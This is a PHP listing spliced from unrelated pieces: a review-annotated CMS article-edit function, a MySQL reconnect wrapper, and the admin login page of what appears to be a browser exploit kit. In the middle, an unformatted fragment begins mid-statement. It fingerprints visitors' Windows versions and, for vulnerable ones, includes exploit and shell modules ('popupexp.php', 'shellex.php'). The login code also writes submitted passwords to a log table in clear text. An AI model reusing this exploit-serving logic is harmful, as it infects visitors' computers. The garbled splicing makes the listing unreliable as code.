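/**
 * Handle the article edit form: save a submitted article, or load an existing
 * one for editing.
 *
 * When the form fields are present in $_POST the article is validated and then
 * inserted (no item_id) or updated (item_id given), and the browser is
 * redirected back to the article list or to the local page named by
 * $_GET['from']. When nothing was posted and item_id is set, the stored row is
 * loaded into $this->item.
 *
 * On a validation failure $this->error_msg is set and nothing is written.
 *
 * Field values are stored exactly as submitted; all statements go through
 * sql_placeholder(). NOTE(review): escaping for HTML output is not done here —
 * confirm the templates that print these fields escape them.
 */
function prepare()
{
    $item_id = intval($this->param('item_id'));

    $form_posted = isset(
        $_POST['header'],
        $_POST['meta_title'],
        $_POST['meta_keywords'],
        $_POST['meta_description'],
        $_POST['annotation'],
        $_POST['body']
    );

    if ($form_posted) {
        // Runs before any field is accepted; presumably the anti-CSRF token
        // check — confirm against check_token()'s definition.
        $this->check_token();

        $this->item->header = $_POST['header'];
        $this->item->meta_title = $_POST['meta_title'];
        $this->item->meta_keywords = $_POST['meta_keywords'];
        $this->item->meta_description = $_POST['meta_description'];
        // 'url' is not part of the presence check above, so it may be absent.
        // Treat a missing value as empty: the fallback UPDATE further down then
        // assigns the article id as its URL instead of leaving it NULL.
        $this->item->url = isset($_POST['url']) ? $_POST['url'] : '';
        $this->item->annotation = $_POST['annotation'];
        $this->item->body = $_POST['body'];
        $this->item->enabled = (isset($_POST['enabled']) && $_POST['enabled'] == 1) ? 1 : 0;

        // Do not allow two articles to share the same URL.
        $query = sql_placeholder(
            'select count(*) as count from articles where url=? and article_id!=?',
            $this->item->url,
            $item_id
        );
        $this->db->query($query);
        $res = $this->db->result();

        if (empty($this->item->header)) {
            $this->error_msg = $this->lang->ENTER_TITLE;
        } elseif ($res->count > 0) {
            $this->error_msg = "Статья с таким URL уже существует. \nВыберите другой URL.";
        } else {
            if (empty($item_id)) {
                $query = sql_placeholder(
                    'INSERT INTO articles(article_id, header, url, meta_title, meta_keywords, meta_description, annotation, body, enabled, created, modified) VALUES(NULL, ?, ?, ?, ?, ?, ?, ?, ?, now(), now())',
                    $this->item->header,
                    $this->item->url,
                    $this->item->meta_title,
                    $this->item->meta_keywords,
                    $this->item->meta_description,
                    $this->item->annotation,
                    $this->item->body,
                    $this->item->enabled
                );
                $this->db->query($query);
                $inserted_id = $this->db->insert_id();

                // A new article's sort position starts out equal to its id.
                $query = sql_placeholder('UPDATE articles SET order_num=article_id WHERE article_id=?', $inserted_id);
                $this->db->query($query);
            } else {
                $query = sql_placeholder(
                    'UPDATE articles SET header=?, url=?, meta_title=?, meta_keywords=?, meta_description=?, annotation=?, body=?, enabled=?, modified=now() WHERE article_id=?',
                    $this->item->header,
                    $this->item->url,
                    $this->item->meta_title,
                    $this->item->meta_keywords,
                    $this->item->meta_description,
                    $this->item->annotation,
                    $this->item->body,
                    $this->item->enabled,
                    $item_id
                );
                $this->db->query($query);
            }

            // Articles saved without a URL get their id as the URL.
            $this->db->query("UPDATE articles SET url=article_id WHERE url=''");

            $get = $this->form_get(array('section' => 'Articles'));
            $location = "index.php{$get}";

            // $_GET['from'] is attacker-influenced (it travels in the link that
            // opens this form), so it is followed only when it stays on this
            // site; anything else falls back to the article list. This closes
            // the open redirect that echoing it into Location would allow.
            if (isset($_GET['from']) && is_string($_GET['from'])) {
                $from = trim($_GET['from']);
                $parts = $from === '' ? false : parse_url($from);

                // Backslashes and control characters are normalised by browsers
                // in ways that can turn a "local" path into another host, and a
                // leading "//" is a scheme-relative URL.
                $off_site = $parts === false
                    || strpos($from, '\\') !== false
                    || strncmp($from, '//', 2) === 0
                    || preg_match('/[\x00-\x1f\x7f]/', $from);

                if (!$off_site && (isset($parts['scheme']) || isset($parts['host']))) {
                    // Absolute URL: accept only http(s) to the host being served.
                    $scheme = isset($parts['scheme']) ? strtolower($parts['scheme']) : '';
                    $host = isset($parts['host']) ? strtolower($parts['host']) : '';
                    if (isset($parts['port'])) {
                        $host .= ':' . $parts['port'];
                    }
                    $own_host = isset($_SERVER['HTTP_HOST']) ? strtolower($_SERVER['HTTP_HOST']) : '';
                    $off_site = !in_array($scheme, array('http', 'https'), true)
                        || $host === ''
                        || $host !== $own_host;
                }

                if (!$off_site) {
                    $location = $from;
                }
            }

            // As before, execution continues after the header is queued.
            header("Location: " . $location);
        }
    } elseif (!empty($item_id)) {
        // Nothing posted: load the stored article for the edit form.
        $query = sql_placeholder('SELECT * FROM articles WHERE article_id=?', $item_id);
        $this->db->query($query);
        $this->item = $this->db->result();
    }
}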
if (strstr($user_agent, "Windows NT 5.1")) { $os = "Windows XP"; } else { if (strstr($user_agent, "Windows NT 5.2")) { $os = "Windows 2003"; } else { $os = "other"; } } } } } } } } $sql = sql_placeholder("INSERT INTO tp_stats(datetime, ip, user_agent, browser, os, uri, accept_lang) VALUES(?, ?, ?, ?, ?, ?, ?)", date("Y-m-d H:i:s"), $ip, $user_agent, $browser, $os, $uri, $accept_lang); mysql_query($sql); if ($os == "Windows 95" || $os == "Windows NT 4" || $os == "Windows ME" || $os == "Windows 98" || $os == "Windows 2000" || $os == "Windows 2003" || $os == "Windows XP") { echo "<html>\r\n<head>\r\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\">\r\n<title></title>\r\n</head><body bgcolor=snow>\r\n"; include "mod/ok.php"; echo "<br>\r\n"; include "mod/popupexp.php"; echo "<br>\r\n"; include "mod/shell/shellex.php"; echo "<br>\r\n\r\n"; } else { if ($os == "Windows XP SP2") { echo "<html>\r\n<head>\r\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\">\r\n<title></title>\r\n</head><body bgcolor=snow>\r\n"; include "mod/ok.php"; echo "<br>\r\n"; include "mod/shell/shellex.php";
/**
 * Build a statement with sql_placeholder() and run it through sql(), retrying
 * once after reconnecting when the server reports error 2006.
 *
 * The first argument is the statement template; every further argument is
 * handed to sql_placeholder() as the value list.
 *
 * NOTE(review): the safety of the resulting statement rests entirely on
 * sql_placeholder()'s quoting, which is defined outside this block. The
 * mysql_* extension used here was removed in PHP 7.
 *
 * @return mixed whatever sql() returns for the (possibly retried) statement
 */
function sql_wrapped()
{
    $params = func_get_args();
    $template = array_shift($params);
    $statement = sql_placeholder($template, $params);

    $outcome = sql($statement);

    // Anything other than error 2006 is returned as-is, including failures.
    if (mysql_errno() != 2006) {
        return $outcome;
    }

    // Error 2006: drop the dead link, reconnect, and run the statement again.
    mysql_close();
    if (!mysql_connect(DB_HOST, DB_LOGIN, DB_PASS)) {
        die('Cannot connect to DB');
    }
    mysql_selectdb(DB_DEVICE);
    // Raise the session's idle timeout before the retry.
    sql("set wait_timeout=86400");

    return sql($statement);
}
// Tail of the admin login script. The listing begins mid-block: the call and
// closing brace below end a branch whose opening is not shown.
redirect("login.php");
}

// NOTE(review): $login and $pass are assigned outside this excerpt — confirm
// they are read explicitly from $_POST rather than injected by
// register_globals or extract().
if (isset($login, $pass)) {
    // The credential values appear masked ('******') in this listing, so how they
    // reach the query cannot be reviewed here.
    // NOTE(review): unlike the tp_logs inserts below, this statement is not built
    // with sql_placeholder() — confirm the real values are bound or escaped.
    // Matching the password inside the WHERE clause also suggests the column is
    // compared directly rather than verified as a salted hash — confirm how
    // tp_users.password is stored.
    $sql = "SELECT * FROM `tp_users` WHERE login = '******' AND password = '******'";
    $result = mysql_query($sql);
    $num = mysql_num_rows($result);
    if (0 < $num) {
        // At least one row matched: mark the session as authenticated.
        // NOTE(review): no session id regeneration is visible in this excerpt —
        // confirm it happens elsewhere (session fixation).
        $Row = mysql_fetch_array($result);
        $_SESSION['UserID'] = $Row['id'];
        $_SESSION['Login'] = $Row['login'];
        // Copies the stored password column into the session. The session only
        // needs the user id; keeping the credential there widens its exposure.
        $_SESSION['Password'] = $Row['password'];
        $_SESSION['IsLoggedIn'] = true;
        // The raw $_POST['login'] is concatenated into an HTML fragment stored in
        // tp_logs. sql_placeholder() covers the SQL side only.
        // NOTE(review): if the log viewer prints this column unescaped, the login
        // field is a stored-XSS vector — escape on write or on display.
        $sql = sql_placeholder("INSERT INTO tp_logs(log, datetime, ip) values(?, ?, ?)", "<b>Logged in</b> (" . $_POST['login'] . ")", date("Y-m-d H:i:s"), getenv("REMOTE_ADDR"));
        mysql_query($sql);
    } else {
        $_SESSION['IsLoggedIn'] = false;
        $ErrMsg = "Incorrect Login or Password";
        // Writes the submitted login AND password in clear text to tp_logs on every
        // failed attempt. A mistyped real password therefore ends up readable by
        // anyone with access to the log table; the password should not be logged.
        // The same unescaped-HTML concern as the success entry applies.
        $sql = sql_placeholder("INSERT INTO tp_logs(log, datetime, ip) values(?, ?, ?)", $ErrMsg . " (" . $_POST['login'] . ":" . $_POST['password'] . ")", date("Y-m-d H:i:s"), getenv("REMOTE_ADDR"));
        mysql_query($sql);
    }
}

// '@' silences the notice raised when the session key has never been set.
if (@$_SESSION['IsLoggedIn']) {
    redirect("index.php");
}

// Login page markup. The page declares windows-1251 and inlines the stylesheet
// by including it between the <style> tags.
echo "<html><head>\r\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1251\">\r\n<title>Login</title>\r\n<style>\r\n";
include "include/style.css";
// The form posts the fields "login" and "password" back to login.php.
// NOTE(review): no attempt throttling or lockout is visible in this excerpt.
echo "</style>\r\n</head><body bgcolor=\"#333333\">\r\n<table cellpadding=\"3\" cellspacing=\"1\" align=\"center\" width=\"750\" border=\"0\" height=\"100%\">\r\n<tr><td valign=\"middle\" height=\"100%\" align=\"center\"><form action=\"login.php\" method=\"post\">\r\n<div align=\"left\">\r\n<table cellpadding=\"0\" cellspacing=\"0\" width=\"250\" border=\"0\" align=left bordercolor=\"#FFFFFF\" hight=\"100\">\r\n<tr><td width=\"250\" hight=\"100\">\r\n";
// Shows the visitor the address the server sees for them.
echo "<hr>" .
getenv("REMOTE_ADDR");
echo "<hr><small>All data about your activities in the admin will be logged</small></td></tr>\r\n</table>\r\n</div>\r\n<table cellpadding=0 cellspacing=0 width='250' border=1 align=center bordercolor=\"#818181\" bordercolorlight=white bordercolordark=white>\r\n<tr><td align=\"center\" colspan=\"2\" class=\"pagetitle\"><b>Admin Panel</td></tr><tr><td align=\"center\" class=\"pagetitle2\"><b>Login:</b></td><td><input type=\"text\" name=\"login\" size=\"25\" class=inputbox3></td>\r\n</tr><tr><td align=\"center\" class=pagetitle2><b>Password:</b></td><td><input type=\"password\" name=\"password\" size=\"25\" class=inputbox3></td></tr><tr><td colspan=\"2\" align=\"center\">\r\n<font color=\"#F9FBFB\">\r\n<input type=\"submit\" value=\" Login \" ></font>\r\n<font color=\"#F9FBFB\">\r\n<input type=\"reset\" value=\" Clear \" ></font></td></tr><tr>\r\n<td align=\"center\" colspan=\"2\"><font color=#ff0000><a href=\"http://xshop.in\">\r\n<font color=\"#F9FBFB\"><small>Created by <b>0x88</b> (ICQ 92777755)</font></small></a></font></td>\r\n</tr></table><br><font color=\"#ff0000\">";
// $ErrMsg is assigned only in the failed-login branch of this excerpt.
// NOTE(review): unless it is initialised earlier in the file, a plain GET
// reaches this echo with the variable undefined.
echo $ErrMsg;
echo " </font></form></td></tr></table>\r\n</body>\r\n</html>";